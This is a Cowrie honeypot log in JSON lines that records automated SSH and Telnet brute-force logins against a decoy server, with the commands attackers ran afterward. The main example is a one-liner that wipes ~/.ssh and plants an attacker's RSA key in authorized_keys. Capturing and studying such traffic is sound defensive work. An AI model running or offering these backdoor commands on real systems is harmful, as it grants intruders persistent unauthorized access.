0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.708039Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.login.success","username":"root","password":"1337","message":"login attempt [root/1337] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:58:06.616665Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:58:07.288490Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:58:07.289539Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:07.663406Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:07.664465Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46308,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8c578e22cdd","protocol":"ssh","message":"New connection: 212.227.125.160:46308 (1.2.3.4:22) [session: f8c578e22cdd]","sensor":"my-vps","timestamp":"2025-09-09T02:58:07.721633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:58:08.007812Z","src_ip":"212.227.125.160","session":"f8c578e22cdd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:58:08.008705Z","src_ip":"212.227.125.160","session":"f8c578e22cdd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1337","message":"login attempt [admin/1337] failed","sensor":"my-vps","timestamp":"2025-09-09T02:58:09.274013Z","src_ip":"212.227.125.160","session":"f8c578e22cdd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:10.511809Z","src_ip":"212.227.125.160","session":"f8c578e22cdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57008,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca483788c4f1","protocol":"ssh","message":"New connection: 212.227.235.229:57008 (1.2.3.4:22) [session: ca483788c4f1]","sensor":"my-vps","timestamp":"2025-09-09T02:58:13.583827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:58:13.584836Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T02:58:13.690882Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-09-09T02:58:13.905334Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:58:13.905917Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-09-09T02:58:14.013056Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:58:14.013667Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:23.583735Z","src_ip":"212.227.235.229","session":"ca483788c4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35964,"dst_ip":"1.2.3.4","dst_port":23,"session":"e2cecb0c421d","protocol":"telnet","message":"New connection: 212.227.235.229:35964 (1.2.3.4:23) [session: e2cecb0c421d]","sensor":"my-vps","timestamp":"2025-09-09T02:58:38.160977Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11867,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca8e5e1fe96e","protocol":"ssh","message":"New connection: 185.152.45.241:11867 (1.2.3.4:22) [session: ca8e5e1fe96e]","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.326427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.329220Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.393037Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.login.success","username":"root","password":"asd2024","message":"login attempt [root/asd2024] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.624311Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:59:00.798454Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.799180Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.800331Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.848432Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:59:00.967808Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:59:00.968811Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.023947Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.024949Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11878,"dst_ip":"1.2.3.4","dst_port":22,"session":"7296aa46858f","protocol":"ssh","message":"New connection: 185.152.45.241:11878 (1.2.3.4:22) [session: 7296aa46858f]","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.075570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.076526Z","src_ip":"185.152.45.241","session":"7296aa46858f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.123498Z","src_ip":"185.152.45.241","session":"7296aa46858f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:59:01.368721Z","src_ip":"185.152.45.241","session":"7296aa46858f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.414237Z","src_ip":"185.152.45.241","session":"7296aa46858f"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11838,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e69956f8872","protocol":"ssh","message":"New connection: 185.152.45.241:11838 (1.2.3.4:22) [session: 1e69956f8872]","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.464520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.465220Z","src_ip":"185.152.45.241","session":"1e69956f8872"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.508817Z","src_ip":"185.152.45.241","session":"1e69956f8872"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.728984Z","src_ip":"185.152.45.241","session":"1e69956f8872"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.774523Z","src_ip":"185.152.45.241","session":"ca8e5e1fe96e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:02.775599Z","src_ip":"185.152.45.241","session":"1e69956f8872"}
{"eventid":"cowrie.session.closed","duration":30.85227656364441,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:09.013185Z","src_ip":"212.227.235.229","session":"e2cecb0c421d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54854,"dst_ip":"1.2.3.4","dst_port":22,"session":"76058cd9437c","protocol":"ssh","message":"New connection: 217.72.205.35:54854 (1.2.3.4:22) [session: 76058cd9437c]","sensor":"my-vps","timestamp":"2025-09-09T02:59:52.313265Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:59:52.314265Z","src_ip":"217.72.205.35","session":"76058cd9437c"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11883,"dst_ip":"1.2.3.4","dst_port":22,"session":"8da726a39b87","protocol":"ssh","message":"New connection: 185.152.45.241:11883 (1.2.3.4:22) [session: 8da726a39b87]","sensor":"my-vps","timestamp":"2025-09-09T03:00:16.954921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:00:16.959749Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.018241Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.login.success","username":"root","password":"imbroglio","message":"login attempt [root/imbroglio] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.219307Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:00:17.346655Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:00:17.347532Z","src_ip":"185.152.45.241","session":"8da726a39b87"}
